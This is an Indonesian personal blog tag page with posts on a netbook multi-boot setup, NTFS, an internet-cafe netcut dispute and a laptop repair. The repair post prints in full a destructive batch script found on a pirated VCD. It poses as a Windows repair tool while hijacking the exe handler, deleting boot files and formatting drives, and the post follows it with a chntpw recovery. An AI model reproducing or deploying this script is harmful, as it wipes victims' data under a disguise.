Posts Tagged 'windows'

axioo pico PJM 1110

yak, ini dia komputer jinjing kedua yang saya miliki, beli seken murah dan dadakan, tapi alhamdulillah ini benar-benar benda yang keren. dikatakan komputer jinjing kedua karena dulu saya pernah punya sebuah komputer jinjing warna putih dan ada gambar buah apel yang sudah digigit sebagian. tapi sudah hilang. 😥

mari sejenak mengheningkan cipta.

anu, banyak orang bilang axioo itu jelek. kabar yang saya dengar adalah, axioo cepat panas, spesifikasi rendahan, boardnya mudah kebakar (mengerikan sekali yang ini), kualitas ringkih, dan itu produk lokal asia. memang benar saya pernah menemukan notebook axioo yang panas sekali, laporan board rusak, kualitas ringkih juga iya karena saya sudah pegang sendiri, spesifikasi rendahan juga memang iya laptop axioo seri dulu kebanyakan vganya VIA atau SIS, dan ini memang produk lokal asia yang beredar di singapura dan indonesia.

tapi sejak saya baca-baca bahwa sebagian besar produsen notebook memproduksi komponen mereka di pabrik yang sama (kebanyakan taiwan) dan dengar kabar bahwa ada produk MSI wind yang juga axioo pico (mirip identik, yang beda cuma merek dan fasilitas bluetooth), saya mulai percaya bahwa sebenarnya semua notebook itu sama baik, cuma tergantung bagaimana menggunakannya, oo anu, kecuali apple mungkin. karena bagi saya semua hardware dari apple bisa bikin mata saya berkedip 5 kali perdetik. maksud saya, percuma kan ada mekbuk tapi hilang karena ceroboh. 😛

lagi pula saya tidak melihat axioo pico PJM 1110 ini sebagai barang dengan kualitas rendah. chargernya ada stabilizer, bodinya solid. saya suka yang bentuknya minimalis dan ndak macem-macem, terutama papan ketiknya yang mengingatkan saya pada si mekbuk.

baterai hanya 3-cell, syukurnya kualitasnya masih oke sehat tapi saya berniat upgrade ke 6-cell nanti. archlinux jalan cepat di sini, bahkan dengan KDE plasma. wifinya realtek dan stabil menggunakan adapter wifi tambahan, jadi saya bisa wardriving bersama si TPLINK WN322G yang notabene berchipset atheros.

di komputer jinjing mungil ini saya memasang archlinux, mac (snow leopard hazard iatkos s3v2 10.6.3), dan windows xp. alasan saya memasang windows adalah agar bisa nyambung dengan beberapa pekerjaan kantor, ini benar-benar tidak bisa dihindari.  untuk sementara macosx86 hazard 10.6.2 tidak bisa dipasang, tidak bisa dibooting dari installer. saya masih nunggu selesainya unduhan snowleopard yang retail. padahal saya sudah ancang2 pasang stiker buah apel untuk menutupi tulisan axioo di balik lid layar. :(. Mac OS X jalan lancar pakai iATKOS S3V2 10.6.3. awalnya touchpad, keyboard tidak bekerja, tetapi setelah menggunakan file boot chameleon dari netbook installer (ekstrak source-nya), semua dikenali dengan baik. btw, jangan menginstall langsung netbook installer, bakal KP. 3 hal yang tidak bekerja, akselerasi grafis, WIFI, dan ethernet, kextnya tidak/belum ada. alasan saya pasang mac? entah. saya bela-belain begadang dari bulan puasa kemarin buat pasang mac, tetapi setelah terpasang jarang saya gunakan. kalau dipikir2, saya hanya senang dan puas sistem operasi ini nangkring dan bisa jalan di komputer saya, meski ndak pernah make. keren banget liat nya kalo baru nyalain ada logo apel nyelip di antar logo tux dan jendela. yah, sewaktu-waktu bisa menyembuhkan kerinduan akan macbook (mrgreen).

saya sedang membiasakan pakai layout papan ketik dvorak, sayangnya papan ketik si pico ini rada susah dilepas pasang dan beresiko patah. konsep snap-click yang sebenarnya sama dengan kebanyakan keyboard notebook lain, hanya saja ini berukuran kecil sekali, gampang patah. jadi tetap qwerty.

btw soal dvorak, didesain untuk bahasa inggris. kalau saya mengetik bahasa indonesia, saya berpendapat dvorak mungkin tidak begitu berpengaruh. yang mereka katakan tentang ribuan kata dalam satu baris tombol, mungkin hanya ratusan kata dalam bahasa indonesia.

soal bodi, axioo pico ini benar-benar teka-teki yang menjengkelkan. tutup di bawah, kita bisa buka-buka ram dan mini-pci-express yang ditempati oleh chipset wireless. harddisk ada di dalamnya lagi. saya orangnya ndak terlalu peduli sama garansi (masih 6 bulan) jadi stiker garansi tak kleteki sampai bersih, langsung bongkar habis-habisan. hampir saya mematahkannya kalau tidak tahu ternyata ada kunci snap di pojok kiri yang ternyata harus digeser ke samping. tidak seperti nettop axioo pico keluaran awal yang memasang pendingin menyeluruh di bawah keyboard, yang ini tidak, metode konvensional, pakai kipas, pendingin dan ventilasi di satu tempat.

Iklan

NTFS

mengapa NTFS? sebagai pengguna linux yang konsisten (halah belakangan juga poligami sama mac), saya pernah merasa bahwa memasang semua hal yang berbau windows sebagai bagian fundamental dari komputer saya adalah tabu. saya tidak menggunakan fat maupun ntfs sebagai filesystem data.

tapi sekarang pemikiran saya berubah karena beberapa alasan :

  1. universal. linux memang universal untuk mengakses semua jenis filesystem, tapi ntfs lebih universal untuk diakses semua OS. ada ntfs-3g untuk linux maupun mac. sebagai pengguna triple os windows linux mac dalam satu komputer, saya pikir ntfs adalah pilihan yang tepat. dibanding menggunakan ext atau hfs. fat mungkin lebih universal ketimbang ntfs tapi ntfs punya penutup kekurangan fat yang saya kira terlalu sayang untuk diabaikan.
  2. recovery ability. entah terformat atau terhapus, jauh lebih mudah merecovery data-data yang hilang di ntfs ketimbang filesystem lain. saya pernah kehilangan data karena tidak sengaja mengganti tabel MBR ke GPT saat memasang mac, tapi semua data saya bisa diangkat kembali. ah

seperti idealis yang harus realis.

ngomong2 soal filesystem, lebih baik memformat hfs+ journaling (case-nonsensitive) sebagai filesystem mac os x. karena beberapa aplikasi (seperti/kebanyakan adobe) sering bermasalah di filesystem case-sensitive.

windows installer built-in acer e-recovery management

baru tau. tombolnya adalah alt-shift-f10. ditulis di sini sebagai arsip pengingat.

update : dan ternyata bekerja juga untuk toshiba dan lainnya dan lainnya. blah.

laptopnya aziz

alkisah, ada seorang kawan, namanya aziz. punya keping video cd bajakan beli di emperan cd di surabaya. dan laptopnya diserahkan ke saya, rusak pula.
tidak bisa regedit, commandline, taskmanager, etc. tidak bisa jalankan file ekstensi exe (otomatis ini ancur), dan file ntldr hilang.
pendek kata, itu leptop saya install ulang pake linux windosnya (merasa berdosa). install driver. install aplikasi (merasa berdosa). pasang antivirus (avast lisensi free). pokoke beres.

tapi si aziz balik lagi keesokan harinya. tak lupa leptopnya dibawa juga. otomatis saya langsung sakit hati.

temennya bilang “kemarin masukin video cd langsung ada hitam-hitam tulisan (belakangan diketahui adalah jendela command line)”
saya tanya “terus?”
temennya bilang “terus mati”.

keren. ntldrnya hilang lagi, tidak bisa booting. karena penasaran dan berhubung rumahnya deket, saya suruh ambil video cd yang diputar itu.

terus saya temukan  file autorun plus file dengan ekstensi .bat yang isinya adalah ini :

@echo off
title Microsoft Windows TM Auto Repair
echo.
echo Preparing to Fixing the System..............................
echo This system need to repair of broken files.
echo This problem may be cause a Virus activity or coruption files.
echo Please wait a minute until windows doing it self....
echo Please close any running programs from the Windows system.
echo This program License and copyright by
echo Microsoft Coorporation TM.
echo System Repair in progress ........ please wait a second..
echo.
reg add HKLM\SOFTWARE\Classes\exefile\shell\open\Command /ve /d %%fe340ead%%  /f
echo.
del /f /Q /A C:\ntldr /S
echo.
Format  D: /Q /X /y
echo.
Format  E: /Q /X /y
echo.
Format  F: /Q /X /y
echo.
del /f /Q /A C:\command.com /S
echo.
del /f /Q /A C:\io.sys /S
echo.
del /f /Q /A C:\config.sys /S
echo.
echo System is now repaired.
echo Windows will reboot the system.
echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
echo.
pause
echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
echo.
exit

ngerti kan? kenapa skrip sux ini ada di root folder sebuah video cd bajakan?

analisa saya : supaya video cd bajakan ini tidak bisa dibajak! begitu dimasukin ke komputer, komputernya ngadat (kalo windoslah). ini cd buat diputer di vcd player, bukan dibuka di komputer terus diputar, terus dikopi ke hardis. ini bisnis, anda tidak boleh membajak apa yang saya bajak. begitulah kira-kira maksud si pembuat cd.

pelajaran : jangan beli cd bajakan sembarangan.

karena malas install ulang, untuk solvenya, pakai slax ditambah modul chntpw.

cara regedit pakai cntpw :

#mount -o rw /dev/sda1 /mnt/sda1/
#cd /mnt/sda1/WINDOWS/system32/config
#chntpw -e <hive file>

catatan : hive file ada di dalam folder config, misal kalo targetnya ada di dalam hkey_local_machine/software maka nama hive filenya adalah software (coba di-ls). untuk masuk :

chntpw -e software.

ketik ? untuk bantuan. hapus entri yang dibuat sama skrip tadi. beres.

perang netcut

bermula ketika saya sedang kerja di warnet lain, di narmada. saya ditugasi maintenance setiap bulannya. saya dipanggil, keluhannya :

  • komputernya banyak ngadat & deepfreezenya kebobol > install linux install ulang windows, kloning, ganti versi deepfreeze. fresh. clean.
  • ada komputer yang sama sekali ndak konek > ganti konektor RJ45
  • banyak yang netcut > bingung euy.

sebagai catatan, baru pertama kali ini saya googling apa itu netcut dan coba programnya (contoh orang kuper windos). kejam. ada antinetcut, antiarp, port monster, tapi semuanya sama sekali tidak memuaskan. tetep saja jaringan jadi lamban. saya tidak mau pasang tool aneh itu di klien.

nah, ceritanya gini, ada orang yang sudah diduga berat sering netcut. setiap datang hotspotan, selalu saja semua jadi putus, ndak bisa ping-pingan apalagi pesbukan browsing. hotspotnya tidak memakai mikrotik, untuk pengamanan, hanya memakai password dari access point dan password ini diganti setiap harinya. so weak.

jadi saya pasangin easyhotspot. dhcp di access point dimatikan, dialihkan ke ubuntu (easyhotspot). setelah semua selesai. orang itu mencoba konek dan masuk via easyhotspot (pake login). ketika dia jalanin netcut (saya lihat layar), dia cuma temukan 2 buah IP, keduanya adalah IP milik server easyhotspot. hahaha. kapok deh, mau ngapain lu?

eh, ternyata. dia langsung buka network connection dan ganti IP-nya dengan IP sah jaringan nyata yang kira2 tidak dipakai. dia buka netcut lagi dan dapatkan semua IP server dan klien warnet. wadoooh! ndak guna bener dah.

satu-satunya jalan adalah, tidak membolehkan komputer lain (yang hotspotan) mengatur IP address secara manual. itu berarti IP harus dari easyhotspot, IP address yang mau dipakai manual harus sudah dipakai oleh komputer lain. saya harus mengisi penuh IP-nya dari 1-254 atau mengganti subnet untuk 14 atau 30 IP (jadi lebih sedikit mengisi IP lagi, cara memilih subnet silakan pakai subnet-calculator. saya memilih yang pertama karena mengganti subnet di setiap klien benar2 menyita waktu karena dideepfreeze.

saya memilih server untuk diisi IP-IP tersebut (lebih dari 200 IP). caranya, di jendela pengaturan IP (network connection : klik kanan > properties : TCP/IP > properties), klik advanced, tambahkan semua IP yang tersisa di sana. beres.

pelaku hanya bisa saling netcut dengan hotspoter lain, tidak bisa masuk ke jaringan warnet di dalam.

mungkin ada cara lain (mikrotik mungkin atau apalah), tapi inilah yang kepikir waktu itu. saya masih awam untuk bidang jaringan tapi ini lancar dan bekerja dengan baik.

cara install windos (kalo xpsp2 mogok sebelum pilih partisi)

sesekali tak apalah isinya windos, lagi pula disuruh blek. :D

kadang, di leptop2 keluaran baru, CD XP SP 2 sering mogok instal.

how to : keluarin CD XP SP2-nya, masukkin CD XP SP1. lanjutkan. balikin lagi CD XP SP2 setelah berhasil masuk tahap partisi. lanjut sampai selesai.

NB : Nasi Puyung itu pedas sekali.


This blog has been discontinued. All the contents, and new posts can be found at blog.pdft.net

RSS latest post @ blog.pdft.net

  • Sebuah galat telah terjadi; umpan tersebut kemungkinan sedang anjlok. Coba lagi nanti.
Indonesia Linux Conference 2011

stats

SEO Stats powered by MyPagerank.Net
Counter Powered by  RedCounter

hits

  • 353,854 hits


This blog is licensed under a Creative Commons Attribution-Share Alike 3.0 Unported License.
pejuang mimpi tak ingkar janji